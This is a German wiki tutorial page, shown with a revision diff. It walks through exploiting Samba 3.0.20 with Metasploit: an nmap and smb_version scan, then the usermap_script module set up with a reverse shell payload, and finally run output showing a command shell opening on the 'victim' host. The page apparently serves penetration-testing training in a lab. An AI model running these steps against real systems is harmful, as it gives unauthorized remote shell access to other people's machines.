Metasploit Exploit und Payload (Samba): Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 49: | Zeile 49: | ||
===PAYLOAD=== | ===PAYLOAD=== | ||
| − | * | + | *msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse |
PAYLOAD => cmd/unix/reverse | PAYLOAD => cmd/unix/reverse | ||
| − | + | ;Mit '''show options''' kann die momentane Konfiguration | |
| − | + | *msf6 exploit(multi/samba/usermap_script) > show options | |
| − | |||
Module options (exploit/multi/samba/usermap_script): | Module options (exploit/multi/samba/usermap_script): | ||
Version vom 30. Juni 2021, 15:44 Uhr
Schwachstelle suchen
Mittels nmap einen Port suchen. In diesem Fall Samba
- map -sV 10.0.10.105 -p 445
... 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Genaue Version
- Durch nmap kann die genaue Version von Samba nicht gesehen werden.
- Deshalb wird ein Modul von Metasploit benötigt.
msfconsole starten
- msfconsole
- Ab hier geht es in der msfconsole weiter
- msf6 > use auxiliary/scanner/smb/smb_version
- Nun wird noch die RHOSTS (Die IP des Opfers) benötigt
- msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.10.105
- Durch den Befehl show options werden die momentanen Einstellung gezeigt
- msf6 auxiliary(scanner/smb/smb_version) > show options
- Durch das absetzen von dem Befehl run kann nun die genaue Samba Version ermittelt werden
- msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.10.105:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
Passendes Module suchen
- Um nach Modulen zu suchen die wir nun für diese Version nutzen können muss folgender Befehl abgesetzt werden
- search Samba 3.0.20
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
Laden das Modul
- use exploit/multi/samba/usermap_script
- Und mittels des Befehls info kann eine genaue Beschreibung des Modules eingesehen werden.
- Anhand der Beschreibung durch info kann erkannt werden, dass dieses Module zu unserer Version passt und wir hiermit Befehle auf dem Opfer ausführen können.
Konfiguration des Samba Modules
- Für das Module muss wieder der RHOST und ein PAYLOAD eingetragen werden.
RHOST
- msf6 exploit(multi/samba/usermap_script) > set RHOST 10.0.10.105
RHOST => 10.0.10.105
PAYLOAD
- msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
- Mit show options kann die momentane Konfiguration
- msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 10.82.1.101 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 139 yes The target port (TCP) Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.82.10.99 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
- Jetzt den Befehl exploit absetzen und man hat Zugriff auf das Opfer
msf5 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP double handler on 10.82.10.99:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo mH5y7FbXzHZhu0dC; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "mH5y7FbXzHZhu0dC\r\n" [*] Matching... [*] A is input... [*] Command shell session 2 opened (10.82.10.99:4444 -> 10.82.1.101:44347) at 2020-11-02 15:35:17 +0100
- Es können Befehle wie pwd, cd , hostname usw.. genutzt werden